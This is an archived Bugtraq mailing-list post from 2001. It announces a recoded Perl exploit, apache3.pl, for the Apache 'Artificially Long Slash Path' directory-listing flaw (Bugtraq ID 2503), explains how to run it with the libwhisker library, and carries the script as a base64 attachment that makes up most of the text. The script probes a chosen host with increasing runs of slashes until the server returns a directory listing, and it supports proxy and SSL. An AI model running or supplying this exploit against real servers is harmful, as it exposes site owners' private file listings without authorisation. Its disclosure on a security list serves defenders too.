[21251] in bugtraq
Re: Fw: Bugtraq ID 2503 : Apache Artificially Long Slash Path
daemon@ATHENA.MIT.EDU (rain forest puppy)
Fri Jun 29 03:15:36 2001
Date: Thu, 28 Jun 2001 18:06:52 -0500 (CDT)
From: rain forest puppy <rfp@wiretrip.net>
To: bugtraq@securityfocus.com
Cc: kmx@egatobas.org, siberian@sentry-labs.com
Message-ID: <Pine.LNX.4.10.10106281754440.3273-200000@eight.wiretrip.net>
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1640944207-528934193-993769116=:3273"
Content-ID: <Pine.LNX.4.10.10106281801510.3312@eight.wiretrip.net>
--1640944207-528934193-993769116=:3273
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.10.10106281801511.3312@eight.wiretrip.net>
Well, I might as well have my hand in recoding this exploit. ;)
Attached is apache3.pl, which is a recoded version of Siberian's recode of
Matt Watchinski's exploit. My version uses libwhisker, which allows the
exploit to have HTTP/1.1, proxy, and SSL support automatically. Basic
support (not including SSL) should work for any platform having Perl.
To use the attached exploit, you'll need a copy of libwhisker. The latest
is pr3, downloadable at:
http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=7
You can either grab the developer tarball and build/install it, or just
grab the libwhisker.pm, put it in the same directory as the apache3.pl,
and just run apache3.pl--perl will use the libwhisker.pm module in the
same directory.
For SSL support, you'll need either Crypt::SSLeay or Net::SSLeay installed
(which may require OpenSSL). I think ActiveState has ported
Crypt::SSLeay/Net::SSL (not Net::SSLeay) over to Windows, so Windows users
should have SSL support as well.
If anyone is interested in libwhisker and further using it, consider
joinging the whisker-devel mailing list at:
http://sourceforge.net/projects/whisker/
And as always, feedback always welcome. See everyone at BlackHat/DefCon!
- rfp
--1640944207-528934193-993769116=:3273
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="apache3.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.10106281758360.3273@eight.wiretrip.net>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME="apache3.pl"
IyEvdXNyL2Jpbi9wZXJsDQojDQojIG9yZ2luYWwgYnkgZmFybTksIEluYy4g
KGNvcHlyaWdodCAyMDAxKQ0KIyB0aGVuIG1vZGlmaWVkIGJ5IFNpYmVyaWFu
ICh3d3cuc2VudHJ5LWxhYnMuY29tKQ0KIyB3aXRoIG1vcmUgbW9kaWZpY2F0
aW9ucyBieSByZnAgKHd3dy53aXJldHJpcC5uZXQvcmZwLykNCiMNCiMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQoNCnVzZSBsaWJ3aGlza2VyOw0K
dXNlIEdldG9wdDo6U3RkOw0KDQojIGFwYWNoZTMucGwNCiMgdGhpcyBleHBs
b2l0IHdhcyBtb2RpZmllZCB0byB1c2UgdGhlIGxpYndoaXNrZXIgbGlicmFy
eSwgd2hpY2ggZ2l2ZXMNCiMgSFRUUC8xLjEsIHByb3h5LCBhbmQgU1NMIHN1
cHBvcnQuICBQbHVzLCBzbWFsbCBvdGhlciBjaGFuZ2VzLg0KDQokfCsrOw0K
bXkgKCVoaW4sJWhvdXQsJWFyZ3MpOw0KDQpwcmludCAiQXBhY2hlIEFydGlm
aWNpYWxseSBMb25nIFNsYXNoIFBhdGggRGlyZWN0b3J5IExpc3RpbmcgRXhw
bG9pdFxuIjsNCnByaW50ICJTZWN1cml0eUZvY3VzIEJJRCAyNTAzXG5cbiI7
DQpwcmludCAiT3JpZ2luYWwgZXhwbG9pdCBjb2RlIHdyaXR0ZW4gYnkgTWF0
dCBXYXRjaGluc2tpICh3d3cuZmFybTkuY29tKVxuIjsNCnByaW50ICJSZXdy
aXR0ZW4gYW5kIGZpeGVkIGJ5IFNpYmVyaWFuICh3d3cuc2VudHJ5LWxhYnMu
Y29tKVxuIjsNCnByaW50ICJNb3ZlZCB0byBsaWJ3aGlza2VyIGJ5IHJmcFxu
XG4iOw0KDQpnZXRvcHRzKCJwOkw6SDpzUDpSOmg6IixcJWFyZ3MpOw0KDQpp
ZigkYXJnc3tofSBlcSAnJyl7DQogcHJpbnQgJ1VzYWdlOiAuL2FwYWNoZTMu
cGwgPG9wdGlvbnM+LCB3aGVyZSBvcHRpb25zOicsIlxuIjsNCiBwcmludCAn
LWggaG9zdCAgaG9zdCB0byBzY2FuIChtdXN0IGJlIHNwZWNpZmllZCknLCJc
biI7DQogcHJpbnQgJy1wICMjCSBob3N0IHBvcnQgKGRlZmF1bHQ6IDgwKScs
IlxuIjsNCiBwcmludCAnLUwgIyMJIGxvdyBlbmQvc3RhcnQgb2YgcmFuZ2Ug
KGRlZmF1bHQ6IDEpJywiXG4iOw0KIHByaW50ICctSCAjIwkgaGlnaCBlbmQv
ZW5kIG9mIHJhbmdlIChkZWZhdWx0OiA4MTkyKScsIlxuIjsNCiBwcmludCAn
LVAgaG9zdAkgSFRUUCBwcm94eSB2aWEgaG9zdCcsIlxuIjsNCiBwcmludCAn
LVIgIyMJIEhUVFAgcHJveHkgcG9ydCAoZGVmYXVsdDogODApJywiXG4iOw0K
IHByaW50ICctcwkgdXNlIFNTTCAoY2FuXCd0IGJlIHVzZWQgd2l0aCBwcm94
eSknLCJcbiI7DQogZXhpdCAwOw0KfQ0KDQokbG93ID0gICRhcmdze0x9IHx8
IDE7DQokaGlnaCA9ICRhcmdze0h9IHx8IDgxOTI7DQoNCiZsdzo6aHR0cF9p
bml0X3JlcXVlc3QoXCVoaW4pOwkJIyBzZXR1cCBvdXIgcmVxdWVzdCBoYXNo
DQoNCiRoaW57J3doaXNrZXInfS0+eydob3N0J309ICRhcmdze2h9Ow0KDQok
aGlueyd3aGlza2VyJ30tPnsncG9ydCd9PSAkYXJnc3twfSB8fCA4MDsNCg0K
aWYoZGVmaW5lZCAkYXJnc3tzfSl7DQogCSRoaW57J3doaXNrZXInfS0+eydz
c2wnfSA9IDE7IA0KDQoJaWYoZGVmaW5lZCAkYXJnc3tQfSl7DQoJCXByaW50
ICJTU0wgbm90IGN1cnJlbnRseSBjb21wYXRpYmxlIHdpdGggcHJveHlcbiI7
DQoJCWV4aXQgMTsgDQoJfQ0KfQ0KDQppZihkZWZpbmVkICRhcmdzeydQJ30p
ew0KCSRoaW57J3doaXNrZXInfS0+eydwcm94eV9ob3N0J309JGFyZ3N7UH07
DQoJJGhpbnsnd2hpc2tlcid9LT57J3Byb3h5X3BvcnQnfT0kYXJnc3tSfSB8
fCA4MDsNCglwcmludCAiVXNpbmcgcHJveHkgaG9zdCAkaGlueyd3aGlza2Vy
J30tPnsncHJveHlfaG9zdCd9IG9uICI7DQoJcHJpbnQgInBvcnQgJGhpbnsn
d2hpc2tlcid9LT57J3Byb3h5X3BvcnQnfVxuIjsNCn0NCg0KDQombHc6Omh0
dHBfZml4dXBfcmVxdWVzdChcJWhpbik7CQkjIGZpeCBhbnkgSFRUUCByZXF1
aXJlbWVudHMNCg0KZm9yKCRjPSRsb3c7ICRjPD0kaGlnaDsgJGMrKyl7DQoN
CgkkaGlueyd3aGlza2VyJ30tPnsndXJpJ30gPSAnLycgeCAkYzsNCg0KCWlm
KCZsdzo6aHR0cF9kb19yZXF1ZXN0KFwlaGluLFwlaG91dCkpew0KCQlwcmlu
dCAiRXJyb3I6ICRob3V0eyd3aGlza2VyJ30tPnsnZXJyb3InfVxuIjsNCgkJ
ZXhpdCAxOw0KCX0gZWxzZSB7DQoJCWlmKCRob3V0eyd3aGlza2VyJ30tPnsn
aHR0cF9yZXNwJ30gPT0gMjAwICYmDQoJCQkkaG91dHsnd2hpc2tlcid9LT57
J2RhdGEnfT1+L2luZGV4IG9mL2kpew0KDQoJCQlwcmludCAiRm91bmQgcmVz
dWx0IHVzaW5nICRjIHNsYXNoZXMuXG4iOw0KCQkJZXhpdCAwOw0KCQl9DQoJ
fQ0KDQoJcHJpbnQgIi4iOyAjIGZvciBzdGF0dXMNCn0NCg0KcHJpbnQgIlxu
Tm90IHZ1bG5lcmFibGUgKHBlcmhhcHMgdHJ5IGEgZGlmZmVyZW50IHJhbmdl
KS5cbiI7DQoNCg0K
--1640944207-528934193-993769116=:3273--
